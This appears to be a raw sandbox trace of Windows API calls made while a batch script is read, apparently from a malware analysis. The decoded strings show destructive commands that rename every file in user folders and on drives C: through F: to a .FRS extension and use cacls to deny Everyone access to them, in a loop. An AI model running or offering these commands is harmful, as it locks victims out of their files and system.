[0081.166] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.166] GetFileType (hFile=0x2f0) returned 0x1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0081.166] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0081.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0081.166] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.166] GetFileType (hFile=0x2f0) returned 0x1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0081.166] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0081.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0081.167] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.167] GetFileType (hFile=0x2f0) returned 0x1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0081.167] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0081.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0081.167] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.167] GetFileType (hFile=0x2f0) returned 0x1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0081.167] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0081.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0081.167] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.167] GetFileType (hFile=0x2f0) returned 0x1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0081.167] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0081.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0081.167] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.167] GetFileType (hFile=0x2f0) returned 0x1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0081.167] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0081.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0081.167] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.167] GetFileType (hFile=0x2f0) returned 0x1 [0081.167] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0081.168] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0081.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0081.168] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.168] GetFileType (hFile=0x2f0) returned 0x1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0081.168] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0081.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0081.168] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.168] GetFileType (hFile=0x2f0) returned 0x1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0081.168] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0081.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0081.168] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.168] GetFileType (hFile=0x2f0) returned 0x1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0081.168] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0081.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0081.168] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.168] GetFileType (hFile=0x2f0) returned 0x1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0081.168] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0081.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0081.168] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0081.169] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.169] GetFileType (hFile=0x2f0) returned 0x1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0081.169] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0081.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0081.169] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.169] GetFileType (hFile=0x2f0) returned 0x1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0081.169] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0081.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0081.169] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.169] GetFileType (hFile=0x2f0) returned 0x1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0081.169] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0081.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0081.169] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.169] GetFileType (hFile=0x2f0) returned 0x1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0081.169] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0081.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0081.169] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.169] GetFileType (hFile=0x2f0) returned 0x1 [0081.169] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0081.170] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0081.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0081.170] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.170] GetFileType (hFile=0x2f0) returned 0x1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0081.170] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0081.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0081.170] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.170] GetFileType (hFile=0x2f0) returned 0x1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0081.170] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0081.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0081.170] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.170] GetFileType (hFile=0x2f0) returned 0x1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0081.170] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0081.170] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0081.170] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.170] GetFileType (hFile=0x2f0) returned 0x1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0081.170] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.170] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0081.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0081.171] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.171] GetFileType (hFile=0x2f0) returned 0x1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0081.171] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0081.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0081.171] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.171] GetFileType (hFile=0x2f0) returned 0x1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0081.171] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0081.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0081.171] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.171] GetFileType (hFile=0x2f0) returned 0x1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0081.171] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0081.171] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0081.171] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0081.171] _get_osfhandle (_FileHandle=3) returned 0x2f0 